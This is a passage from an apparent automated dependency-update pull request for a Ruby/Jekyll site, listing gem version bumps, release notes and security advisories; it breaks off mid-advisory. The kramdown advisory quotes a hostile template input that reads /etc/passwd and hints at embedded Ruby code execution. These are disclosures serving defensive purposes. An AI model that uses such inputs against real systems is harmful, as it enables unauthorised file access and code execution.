1.18.2

octokit upgrade

1.18.1

Updates Cloudflare IPs to latest output of script/update-cloudflare-ips

Add _ domain name validation

1.17.9

What's Changed

Fix IPv6 support (AAAA records validation) in #140

Full Changelog: v1.17.8...v1.17.9

1.17.8

What's Changed

Require bundler in script/check to avoid needing to run bundle exec. by @jriggins in #137

Remove Travis builds by @jriggins in #138

Add AAAA Support by @jriggins in #136

Bump version to 1.17.8 by @jriggins in #139

Full Changelog: v1.17.7...v1.17.8

1.17.6

Query DNS to Determine Apex Domains

1.17.2

Allows for non-200 requests to satisfy served_by_pages? if the response still looks like it was served by GitHub.

1.17.1

Update Cloudflare IPs.

1.17.0

Fix CI which is broken on master #115 (by @kytrinyx)

Silence warnings triggered by Ruby 2.7 #116 (by @kytrinyx)

Update dependencies to be compatible with Ruby 2.7 #117 (by @kytrinyx)

Update dotenv requirement from ~> 1.0 to ~> 2.7 #120 (dependabot)

Update gem-release requirement from ~> 0.7 to ~> 2.1 #119 (dependabot)

Update webmock requirement from ~> 1.21 to ~> 3.8 #118 (dependabot)

Upgrade to Ruby 2.7 & incorporate a Dockerfile #121 (by @parkr & @MarkTiedemann)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ html-pipeline (indirect, 2.12.0 → 2.14.3) · Repo · Changelog

Release Notes

2.14.0

Make Rinku configurable: #335

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 54 commits:

↗️ http_parser.rb (indirect, 0.6.0 → 0.8.1) · Repo

Commits

See the full diff on Github. The new version differs by 69 commits:

↗️ i18n (indirect, 0.9.5 → 1.15.1) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll (indirect, 3.8.5 → 3.10.0) · Repo · Changelog

Release Notes

3.10.0 (from changelog)

Minor Enhancements

Backport add-csv-dependency from #9522 to Jekyll 3 (#9616)

3.10-stable: Add webrick as a dependency (#9620)

3.9.4

Bug Fixes

Backport #9392 for v3.9.x: Add support for Ruby 3.3 Logger (#9513)

3.9.3

Bug Fixes

3.9.x: Support i18n 1.x (#9269)

Backport #8880 for v3.9.x: Support both tzinfo v1 and v2 alongwith
non-half hour offsets (#9280)

Development Fixes

v3.9.x: test under Ruby 3.2 #9272)

v3.9.x: fix rdiscount test (#9277)

3.9.2

Bug Fixes

Lock http_parser.rb gem to v0.6.x on JRuby (#8943)

Backport #8756 for v3.9.x: Respect collections_dir config within include tag (#8795)

Backport #8965 for v3.9.x: Fix response header for content served via jekyll serve (#8976)

Development Fixes

Update and fix CI for 3.9-stable on Ruby 3.x (#8942)

Fix CI for commits to 3.9-stable branch (#8788)

3.9.1

Bug Fixes

Backport #8618 for v3.9.x: Update include tag to be more permissive (#8629)

3.9.0

Minor Enhancements

Allow use of kramdown v2 (#8322)

Add default language for kramdown syntax highlighting (#8325)

3.8.7

Fixes

Prevent console warnings with Ruby 2.7 (#7948)

3.8.6

Bug Fixes

Update log output for an invalid theme directory (#7734)

Memoize SiteDrop#documents to reduce allocations (#7722)

Excerpt handling of custom and intermediate tags (#7467)

Escape valid special chars in a site's path name (#7573)

Revert memoizing Site#docs_to_write and refactor #documents (#7689)

Fix broken include_relative usage in excerpt (#7690)

Install platform-specific gems as required (3c06609)

Security Fixes

Theme gems: ensure directories aren't symlinks (#7424)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll-avatar (indirect, 0.6.0 → 0.8.0) · Repo · Changelog

Release Notes

0.8.0

0.8.0 / 2022-04-15

Minor Enhancements

Use Kernel#format to render <img /> HTML tag (#46)

Check if username and size matches a pattern once (#48)

Bug Fixes

Reduce allocations from computing username (#44)

Stringify keys of :attributes hash (#42)

Parse tag markup once per instance (#40)

Compute :srcset with an array of integer strings (#43)

Assign string values for attributes (#47)

Parse only custom-host provided through ENV (#45)

Development Fixes

Profile memory usage from rendering avatars (#41)

Bundle only relevant files in the gem (#50)

Upgrade to GitHub-native Dependabot (#52)

Remove redundant specifications (#56)

Improve context in workflow job names (#57)

Remove @benbalter-specific community health files (#58)

Update gem specification (#60)

Add workflow to release gem via GH Actions (#63)

Documentation

Fix typo in README.md (#62)

0.7.0

What's Changed

Update rubocop-jekyll requirement from ~> 0.9.0 to ~> 0.10.0 (#38) @dependabot-preview

Cache parsed host url to reduce allocations (#36) @ashmaroli

Avoid unnecessary allocations for empty strings (#34) @ashmaroli

Allow use and testing with Jekyll 4.0 (#32) @ashmaroli

Lint with rubocop-jekyll (#33) @ashmaroli

Update rake requirement from ~> 10.0 to ~> 12.3 (#22) @dependabot-preview

Fix passing username as variable docs in README.md (#20) @chrismytton

update readme (#19) @kenman345

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 57 commits:

↗️ jekyll-coffeescript (indirect, 1.1.1 → 1.2.2) · Repo · Changelog

Release Notes

1.2.2

Bug Fixes

Revert jekyll to be just a development_dependency for v1.x.x series.

1.2.1

Bug Fixes

Re-introduce Ruby 2.3 support and test Jekyll 3.7+ (#33)

1.2.0

Development Fixes

Require Ruby 2.3 (#27)

Major Enhancements

style: Target Ruby 2.4 (#31)

Documentation

Add essential step to readme (#32)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 26 commits:

↗️ jekyll-commonmark (indirect, 1.3.1 → 1.4.0) · Repo · Changelog

Release Notes

1.4.0

Minor Enhancements

Require at least commonmarker-0.22 (#44)

Highlight fenced code-block contents with Rouge (#29)

Bug Fixes

Refactor away extra abstractions (#53)

Development Fixes

DRY begin-rescue-end block with a private helper (#28)

Fix failing CI builds (#33)

Remove gemspec dependency on Jekyll (#34)

Test rendering with invalid configuration (#27)

Refactor to improve readability (#37)

Set up Continuous Integration via GH Actions (#46)

Clean up gemspec (#47)

Add workflow to release gem via GH Actions (#54)

Documentation

Update README to link to commonmarker (#38)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 42 commits:

↗️ jekyll-commonmark-ghpages (indirect, 0.1.5 → 0.5.1) · Repo

Release Notes

0.5.1

What's Changed

Loosen dependency to allow Jekyll < 4 by @yoannchaudet in #36

Full Changelog: v0.5.0...v0.5.1

0.5.0

What's Changed

Remove garbage on unknown lang by @kou in #19

Update commonmarker to 0.23.6 by @anticomputer in #23

Bump version by @yoannchaudet in #24

Add Dependabot config for Bundler and Actions usage by @JamesMGreene in #25

Update rouge requirement from >= 2.0, < 4.0 to >= 2.0, < 5.0 by @dependabot in #26

Security update: bump commonmarker to 0.23.7 by @anticomputer in #28

Create pages-gem.yml by @tsusdere in #34

Bump actions/checkout from 3 to 4 by @dependabot in #29

Update commonmarker requirement from ~> 0.23.7 to >= 0.23.7, < 1.1.0 by @dependabot in #33

Prep 0.5 release by @yoannchaudet in #35

New Contributors

@kou made their first contribution in #19

@anticomputer made their first contribution in #23

@JamesMGreene made their first contribution in #25

@dependabot made their first contribution in #26

@tsusdere made their first contribution in #34

Full Changelog: v0.2.0...v0.5.0

0.2.0

What's Changed

Bump commonmarker to the latest version by @yoannchaudet in #21

New Contributors

@yoannchaudet made their first contribution in #21

Full Changelog: v0.1.6...v0.2.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 53 commits:

↗️ jekyll-default-layout (indirect, 0.1.4 → 0.1.5) · Repo

Release Notes

0.1.5

Allow Jekyll 4.x dependency range (#12) @SUPERCILEX

update documentation for Jekyll 3.5.0+ (#9) @kenman345

Appease Rubocop 0.51 (#6) @DirtyF

Update copyright notice (#8) @DirtyF

CI: test against Ruby 2.4 (#7) @DirtyF

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll-feed (indirect, 0.11.0 → 0.17.0) · Repo · Changelog

Release Notes

0.17.0

Documentation

Update CI status badge (#363)

Development Fixes

Add Ruby 3.1 to the CI matrix (#365)

Minor Enhancements

Allow disabling of jekyll-feed while in development (#370)

0.16.0

Minor Enhancements

Add support for page.description in front matter to become entry <summary> (#297)

Bug Fixes

Fold private methods into the :render method as local variables (#327)

Check post.categories instead of post.category (#357)

Switched xml_escape for <![CDATA[]]> for post content (#332)

Development Fixes

Add Ruby 3.0 to CI (#337)

Lock RuboCop to v1.18.x (#348)

Add workflow to release gem via GH Action (#355)

Documentation

Use .atom extension in documented examples since we write an Atom feed (#359)

0.15.1

Bug Fixes

MetaTag: when encoding for XML special characters, handle non-string objects (#326)

0.15.0

Minor Enhancements

Add support for drafts (#316)

0.14.0

Minor Enhancements

add support for categories (#153) (#233)

add support for tags (#264)

Make posts limit configurable (#314)

XML escape the title field of feed_meta (#306)

Bug Fixes

Fix feed link when post title contains HTML (#305)

Development Fixes

Use Dir to list source files (#309)

Require Ruby >=2.4.0 (#307)

0.13.0

Minor Enhancements

Excerpt only flag (#287)

Add media:content tag (#290)

Development Fixes

test: use categories in post (#249)

0.12.1

Release: v0.12.0 (#271)

Bug Fixes

Re-introduce Ruby 2.3 support and test Jekyll 3.7+ (#272)

0.12.0

Allow Jekyll v4 (still alpha)

Development Fixes

style: fix offenses in specs (#248)

dev: update CI and style settings (#258)

Enable testing for Windows platform (#265)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll-github-metadata (indirect, 2.12.1 → 2.16.1) · Repo · Changelog

Release Notes

2.16.1

Bug Fixes

Update references of help.github.com to docs.github.com (#260)

2.16.0

Minor Enhancements

Update octokit requirement from ~> 4.0, != 4.4.0 to >= 4, != 4.4.0, < 7 (#243)

Prevent loading all GH data on reset (#245)

Deprecate unnecessary constant in GitHubMetadata::Client (#239)

Development Fixes

Update rspec requirement from ~> 3.11.0 to ~> 3.12.0 (#244)

Bump Ruby versions in AppVeyor jobs (#253)

Bump rubocop-jekyll to 0.13.0 and fix rubocop issues (#252)

2.15.0

Bug Fixes

Inject site.github via :pre_render step rather than :after_init (#238)

Documentation

Add GitHub Actions badge and remove Travis one (#236)

2.14.0

Minor Enhancements

Use owner name as site title for User and Organization sites. (#197)

Add site.github.public_repositories[].releases (#224)

Add site.github.public_repositories[].contributors (#234)

Documentation

docs: Add dev docs (#212)

set PAGES_GITHUB_HOSTNAME to hostname without protocol (#191)

Add JEKYLL_ENV limitation for git remote (#185)

Development Fixes

Restore log level after running tests that modify it. (#202)

Add GitHub Actions CI (#211)

Update rubocop-jekyll requirement from ~> 0.5.0 to ~> 0.12.0 (#226)

Create dependabot.yml (#225)

Add rubocop todo file (#230)

Upgrade rspec to 3.11.x (#231)

CI: use 'main' branch instead of 'master' (#232)

Add release workflow (#235)

New Contributors

@lardieri made their first contribution in #200

@MichaelCurrin made their first contribution in #212

@dependabot made their first contribution in #226

@Shegox made their first contribution in #191

@9bow made their first contribution in #234

@at-ishikawa made their first contribution in #185

Full Changelog: v2.13.0...v2.14.0

2.13.0

Minor Enhancements

Lessen Jekyll dependency (#164)

Enable support for topics property (#166)

Allow detecting archived or disabled repos (#176)

Bug Fixes

Conditionally memoize certain private methods in EditLinkTag (#163)

Fix faraday connectionfailed issue (#178)

MetadataDrop: don't use instance variable to check mutations (#173)

Documentation Fixes

List the fields this repo generates for site.github (#171)

Use HTML entities to prevent Liquid from processing this documentation (#172)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll-mentions (indirect, 1.4.1 → 1.6.0) · Repo · Changelog

Release Notes

1.6.0

Minor Enhancements

Allow configuring base URL in page front matter (#72)

Incorporate document data only if it has override (#73)

Development Fixes

ci: test against Jekyll 4.0

style: target Ruby 2.4

ignore vendor/bundle

Bug Fixes

Support handling body tag across multiple lines (#70)

1.5.1

Bug Fixes

Re-introduce Ruby 2.3 support and test with Jekyll 3.7 and beyond (#69)

1.5.0

Development Fixes

Allow Jekyll v4 (still alpha)

Drop support for Ruby 2.3

chore(deps): rubocop-jekyll 0.3 (#65)

Reintroduce style checks (#67)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ jekyll-optional-front-matter (indirect, 0.3.0 → 0.3.2) · Repo · Changelog

Release Notes

0.3.2

Support Jekyll 4.x (#20) @leleabhinav

update documentation (#15) @kenman345

Update README.md for Usage (#13) @ketozhang

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 46 commits:

↗️ jekyll-readme-index (indirect, 0.2.0 → 0.3.0) · Repo

Release Notes

0.3.0

Jekyll 4.x support (#16)

Add with_frontmatter option to README (#12) @KrzysztofKarol

Add support for readmes with front matter (#11) @qwtel

update documentation (#10) @kenman345

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 46 commits:

↗️ jekyll-redirect-from (indirect, 0.14.0 → 0.16.0) · Repo · Changelog

Release Notes

0.16.0

Minor Enhancements

Allows generation of redirects.json to be disabled (#207)

Allow redirects from and for subclasses of page and document (#204)

Bug Fixes

Use Hash#key? instead of Hash#keys.any? (#201)

Development Fixes

Target Ruby 2.4

Stop testing with backwards-compatible site config (#211)

Documentation

Simplifies YAML for redirect_to (#185)

0.15.0

Development Fixes

chore(deps): rubocop-jekyll 0.3 (#187)

Bug Fixes

Allow testing and using with Jekyll 4.x (#196)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

↗️ jekyll-relative-links (indirect, 0.6.0 → 0.6.1) · Repo

Release Notes

0.6.1

Support for Jekyll 4.x

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

↗️ jekyll-remote-theme (indirect, 0.4.0 → 0.4.3) · Repo · Changelog

Release Notes

0.4.3

Updated to use HEAD instead of master as default branch (#87) @IanLee1521

Added extra context to error message when remote theme download fails (#85) @IanLee1521

Require kramdown-parser-gfm to fix travis (#86) @benbalter

Fixes #76 (#77) @orchardcc

0.4.2

Jekyll 4.0 support (#61)

0.4.1

Update jekyll requirement from ~> 3.5 to >= 3.5, < 5.0 (#54) @dependabot-preview

Require rubyzip to version 1.3.0 or later

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

↗️ jekyll-seo-tag (indirect, 2.5.0 → 2.8.0) · Repo · Changelog

Release Notes

2.8.0

Minor Enhancements

Allow to set type for author (#427)

Allow setting author.url (#453)

Implement Facebook domain verification (#455)

Add og:image:alt and twitter:image:alt (#438)

Sort JSON-LD data by key (#458)

Bug Fixes

Set the default og:type to 'website' (#391)

Template: Remove double new line (#454)

Development Fixes

Fix typo in source code comment (#449)

Set up Continuous Integration via GH Actions (#450)

Bump RuboCop to v1.18.x (#452)

Add workflow to release gem via GH Actions

2.7.1

Development Fixes

refactor: mutate site payload instead of duplicating it (#419)

2.7.0

Minor Enhancements

Change pagination message with seo_paginator_message option (#324)

Make Twitter Summary Card without having Twitter account (#284)

Prefer site.tagline to site.description for page title (#356)

Render og:locale meta only when defined explicitly (#388)

Bug Fixes

Ensure a single leading @ for twitter usernames (#367)

Development Fixes

chore(deps): require Ruby > 2.4.0 EOL

test: fix locale specs that use the fallback locale (#360)

refactor: Replace read-only empty hash with private constant (#418)

refactor: Mutate hash literals instead of duplicating them (#417)

refactor: Reduce allocations of instance-agnostic objects (#376)

refactor: Memoize #author_hash in SeoTag::AuthorDrop (#342)

refactor: simplify conditional in SeoTag::Drop#date_modified (#343)

chore(ci): profile seo-tag plugin on a third-party repository (#414)

chore(ci): Jekyll v4.0 (#372)

chore(ci): test against current stable Ruby 2.5 and 2.7 (#385)

style: align with latest jekyll-rubocop (#382)

fix: Travis builds for Jekyll 3.x (#415)

Documentation

Structured Data Testing Tool is deprecated (#409)

Rename Google webmaster tools to Google Search Console (#403)

Improve documentation on plugin usage (#399)

remove Google+ from example snippet (#358)

HTTPS link to https://ogp.me/ (#359)

HTTPS links to schema.org (#350)

use example.com for example URL (#351)

2.6.1

Development Fixes

Test against Jekyll 4.x (#336)

2.6.0

Minor Enhancements

Twitter Image and Title (#330)

Bug Fixes

Do not cache the drop payload for SeoTag (#306)

Update url of schema website (#296)

Development Fixes

Relax version constraint on Bundler (#325)

chore(ci): Add Ruby 2.6, drop Ruby 2.3 (#326)

chore (ci): remove deprecated sudo: false in .travis.yml (#333)

Lint Ruby code with rubocop-jekyll gem (#302)

chore(deps): bump rubocop-jekyll to v0.4 (#320)

chore(deps): bump rubocop-jekyll to v0.3 (#316)

Correct RuboCop offenses in spec files (#319)

Documentation

Rectify error in Usage documentation (#328)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ jekyll-sitemap (indirect, 1.2.0 → 1.4.0) · Repo · Changelog

Release Notes

1.4.0

Minor Enhancements

Avoid overwriting an existing robots.txt (#246)

Bug Fixes

Simulate last_modified_at injection by plugin (#256)

1.3.1

Bug Fixes

Update plugin metadata and dev environment (#244)

Development Fixes

Lock requirement for jekyll-last-modified-at to >= 1.0

1.3.0

Allow Jekyll v4 (still alpha)

Documentation

Add PDF file exclusion documentation (#213)

Correct capitalization of GitHub (#207)

Development Fixes

Use Ruby 2.3 and Rubocop 0.55 (#214)

chore(deps): rubocop-jekyll-0.3 (#227)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 38 commits:

↗️ jekyll-swiss (indirect, 0.4.0 → 1.0.0) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ jekyll-theme-architect (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #48

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 26 commits:

↗️ jekyll-theme-cayman (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #133

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 45 commits:

↗️ jekyll-theme-dinky (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #22

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 21 commits:

↗️ jekyll-theme-hacker (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add Google Analytics to head-custom.html to allow easier customization of the GA code #79

0.1.2

Allow Jekyll v4

Return to home on click page title #47

Show full header h1 for smaller displays #49

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 39 commits:

↗️ jekyll-theme-leap-day (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Added styled KBD tag, like in primer theme #47 (thanks, @gebeto)

Remove 'auto' from padding since it's not a valid padding #57

Add head-custom.html to allow easier customization of the <head> #56

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 34 commits:

↗️ jekyll-theme-merlot (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #10

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

↗️ jekyll-theme-midnight (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add Google Analytics to head-custom.html to allow easier customization of the GA code #37

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 38 commits:

↗️ jekyll-theme-minimal (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #119

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

↗️ jekyll-theme-modernist (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Replace linear_gradient with linear-gradient() CSS function #17

Add head-custom.html to allow easier customization of the <head> #16

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 27 commits:

↗️ jekyll-theme-primer (indirect, 0.5.3 → 0.6.0) · Repo

Release Notes

0.6.0

Add head-custom.html to allow easier customization of the #61

0.5.4

Update Primer CSS

Add default layout to post, page, and home layouts

Lessen Jekyll dependency

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 40 commits:

↗️ jekyll-theme-slate (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #66

Added styled KBD tag, like in primer theme #47 (thanks, @gebeto)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ jekyll-theme-tactile (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #23

Fall back code font-family to monospace #21 (thanks @lkslawek)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

↗️ jekyll-theme-time-machine (indirect, 0.1.1 → 0.2.0) · Repo

Release Notes

0.2.0

Add head-custom.html to allow easier customization of the <head> #22

Added styled KBD tag, like in primer theme #13 (thanks @gebeto)

Fix show_downloads #16 (thanks @deargle)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ jekyll-titles-from-headings (indirect, 0.5.1 → 0.5.3) · Repo

Release Notes

0.5.3

Support jekyll 4 and change Ruby version for travisci (#59) @leleabhinav

Add case for hashes at the end of lines (#38) @MineRobber9000

Fix error when stripping title from a page with frozen content (#32) @robotdana

update documentation (#35) @kenman345

Strip title from excerpt (#28) @qwtel

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 33 commits:

↗️ jemoji (indirect, 0.10.2 → 0.13.0) · Repo · Changelog

Release Notes

0.13.0 (from changelog)

Development Fixes

Add Actions CI workflow (#127)

Add release workflow (#128)

Create dependabot config for rubygems upgrades (#126)

Add github-actions to dependabot (#132)

Bump actions/checkout from 2 to 3 (#133)

Upgrade Rubocop target version to 2.7 (#134)

Update rake requirement from ~> 12.0 to ~> 13.0 (#130)

Minor Enhancements

Update gemoji requirement from ~> 3.0 to >= 3, < 5 & test with both major versions (#131)

0.12.0

Minor Enhancements

perf: don't load Gemoji into memory immediately (#106)

Development Fixes

deps: Ruby > 2.4 (EOL)

ci: test with Ruby 2.7

0.11.1

Bug fix

Support handling body tag across multiple lines (#96)

0.11.0

Development fixes

Test against Jekyll v4

Remove deprecated sudo:false in Travis config

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 41 commits:

↗️ kramdown (indirect, 1.17.0 → 2.4.0) · Repo · Changelog

Security Advisories 🚨

🚨 Remote code execution in Kramdown

Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters namespace, and thus arbitrary classes can be instantiated.

🚨 Unintended read access in kramdown gem

The kramdown gem before 2.3.0 for Ruby processes the template option inside Kramdown documents by default, which allows unintended read access (such as template="/etc/passwd") or unintended embedded Ruby code execution (such as a string that begins with template="string://<%= `). NOTE: kramdown is used in Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.

↗️ liquid (indirect, 4.0.0 → 4.0.4) · Repo · Changelog

Release Notes

4.0.3 (from changelog)

Fixed

Fix break and continue tags inside included templates in loops (#1072) [Justin Li]

4.0.2 (from changelog)

Changed

Add where filter (#1026) [Samuel Doiron]

Add ParseTreeVisitor to iterate the Liquid AST (#1025) [Stephen Paul Weber]

Improve strip_html performance (#1032) [printercu]

Fixed

Add error checking for invalid combinations of inputs to sort, sort_natural, where, uniq, map, compact filters (#1059) [Garland Zhang]

Validate the character encoding in url_decode (#1070) [Clayton Smith]

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ listen (indirect, 3.1.5 → 3.10.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ mini_portile2 (indirect, 2.4.0 → 2.8.9) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ minima (indirect, 2.5.0 → 2.5.1) · Repo · Changelog

Release Notes

2.5.1

Minor enhancements

Allow use and testing with Jekyll 4.x (#398)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 2 commits:

↗️ minitest (indirect, 5.12.2 → 5.27.0) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ nokogiri (indirect, 1.10.4 → 1.19.4) · Repo · Changelog

Security Advisories 🚨

🚨 Nokogiri: Possible Use-After-Free when `Nokogiri::XML::Document#encoding=` raises an exception

Summary

Calling Document#encoding= with an invalid encoding (e.g., a non-string, or a string containing a null byte) raises an exception, but only after freeing the document's current encoding string without replacing it. The document is left referencing freed memory, so the next call to Document#encoding reads invalid memory, which can cause a segfault or leak freed bytes into a Ruby String.

Affects the CRuby (libxml2) implementation only; JRuby is not affected.

Severity

The Nokogiri maintainers have evaluated this as low severity. Reaching it requires an unusual API-usage pattern that does not arise during normal use. The application must pass an invalid encoding to Document#encoding=, rescue the resulting exception, and then continue using the same document. Nokogiri 1.19.4 makes this pattern safe with no change to the public API. The document no longer references freed memory after the exception is raised.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

If users are unable to upgrade, avoid passing attacker-controlled values to Document#encoding=. Applications that only assign developer-authored encodings are not directly exposed.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Possible Use-After-Free when setting an attribute value via `Nokogiri::XML::Attr#value=` or `#content=`

Summary

Nokogiri’s CRuby native extension could leave a Ruby wrapper pointing to freed memory when replacing the value of an XML attribute. If Ruby code had already accessed an attribute child node, Nokogiri::XML::Attr#value= could free the underlying native child node while the wrapper remained reachable through the document node cache. A later use of the freed child node or a Ruby GC mark could dereference an invalid pointer, causing an invalid read and a possible segfault.

Nokogiri 1.19.4 preserves any already-wrapped attribute child nodes before replacing the attribute value.

JRuby is not affected.

Severity

The Nokogiri maintainers have evaluated this as low severity. Reaching it requires an unusual API-usage pattern that does not arise during normal use. The application must directly access an attribute's child node and then replace that same attribute's value via Attr#value= or #content=. Nokogiri 1.19.4 makes this pattern safe with no change to the public API. Already-wrapped attribute child nodes are preserved before the value is replaced.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

As a workaround, avoid accessing attribute child nodes directly via Attr#child or similar before mutating the same attribute’s value.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Possible Use-After-Free in XInclude Processing

Summary

XInclude substitution performed by Nokogiri::XML::Node#do_xinclude replaced each <xi:include> in place, freeing the include node along with its children (such as <xi:fallback> and its descendants) and any namespaces declared on them. If an application had already exposed one of those nodes or namespaces to Ruby, the corresponding Ruby object was left pointing at freed memory. Using the object could result in invalid reads or writes to memory.

Nokogiri 1.19.4 substitutes each <xi:include> on a defensive copy by default, so the structures libxml2 frees are never the ones bound to live Ruby objects.

Only the CRuby implementation is affected; JRuby is not affected.

Severity

The Nokogiri maintainers have evaluated this as low severity. Reaching it requires an unusual API-usage pattern that does not arise during normal use. The application must parse a document without XInclude, traverse into an <xi:include> subtree to expose its nodes or namespaces to Ruby, and only then invoke XInclude processing. The common case, requesting XInclude at parse time, operates on a freshly parsed document whose nodes are not yet exposed to Ruby and is not affected. Nokogiri 1.19.4 makes this pattern safe by default and requires no change to application code.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

As a workaround for earlier versions, perform XInclude substitution at parse time (with the xinclude parse option) rather than calling #do_xinclude on a document that has already been traversed. A freshly parsed document has no nodes exposed to Ruby, so the substitution is safe.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Possible Use-After-Free when directly using `NokogirI::XML::XPathContext` beyond document lifetime

Summary

Nokogiri::XML::XPathContext did not keep its source document alive for garbage collection. If an XPathContext outlived its document and the document was collected, evaluating an XPath expression could read invalid memory and potentially segfault.

This is only reachable when application code constructs an XPathContext directly and lets the document become unreachable while continuing to use the context. The normal Document#xpath, #css, and related search methods are not affected, and it is not triggerable by malicious document input.

Nokogiri 1.19.4 makes XPathContext keep its source document alive for as long as the context exists.

Only the CRuby implementation is affected. JRuby is not affected.

Severity

The Nokogiri maintainers have evaluated this as low severity. Reaching it requires an unusual API-usage pattern that does not arise during normal use. The application must construct an XML::XPathContext directly and continue using it after allowing its source document to be garbage-collected. Nokogiri 1.19.4 makes this pattern safe with no change to the public API. The context now keeps its source document alive for as long as it exists.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

As a workaround, ensure the source document remains referenced for as long as any XPathContext created from it is in use. The standard Document#xpath, #css, and related search methods already do this and are unaffected.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Possible Use-After-Free when setting `Document#root=` to an invalid node type

Summary

Nokogiri::XML::Document#root= validated only that the new root was a Nokogiri::XML::Node, allowing a DTD node to be set as the document root. The result is a heap use-after-free during garbage collection or finalization, leading to an invalid memory read or potentially a segfault.

Nokogiri 1.19.4 restricts Document#root= to element nodes, raising TypeError for any other node type.

This memory-safety issue affects only the CRuby implementation (libxml2). The JRuby implementation was not affected; the same input validation was added there for behavioral parity.

Severity

The Nokogiri maintainers have evaluated this as low severity. This is only triggered by a programming error. It requires application code to assign a non-element node such as a DTD as the document root via Document#root=. Nokogiri 1.19.4 now raises TypeError instead of allowing a use-after-free. It cannot be triggered by untrusted input or through normal use of the public API.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

As a workaround, applications that cannot upgrade should avoid assigning a DTD (or any non-element node) via Document#root=.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Possible Out-of-Bounds Read in `Nokogiri::XML::NodeSet#[]`

Summary

